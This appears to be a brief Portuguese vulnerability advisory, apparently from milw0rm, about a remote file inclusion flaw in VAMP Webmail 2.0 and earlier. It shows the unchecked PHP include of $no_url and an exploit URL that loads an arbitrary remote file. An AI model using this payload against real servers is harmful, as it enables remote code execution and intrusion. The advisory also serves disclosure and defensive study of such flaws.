VAMP Webmail 2.0 - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $no_url do arquivo /setup/yesno.phtml permitem a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: VAMP Webmail 2.0 e anteriores
Download: não disponível
Código vulnerável (/setup/yesno.phtml):

include $yes_url;
} else {
include $no_url;
}?>

Desoberta por: Drago84
Exploit:

http://host/setup/yesno.phtml?no_url=arquivomaligno?

Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: milw0rm.com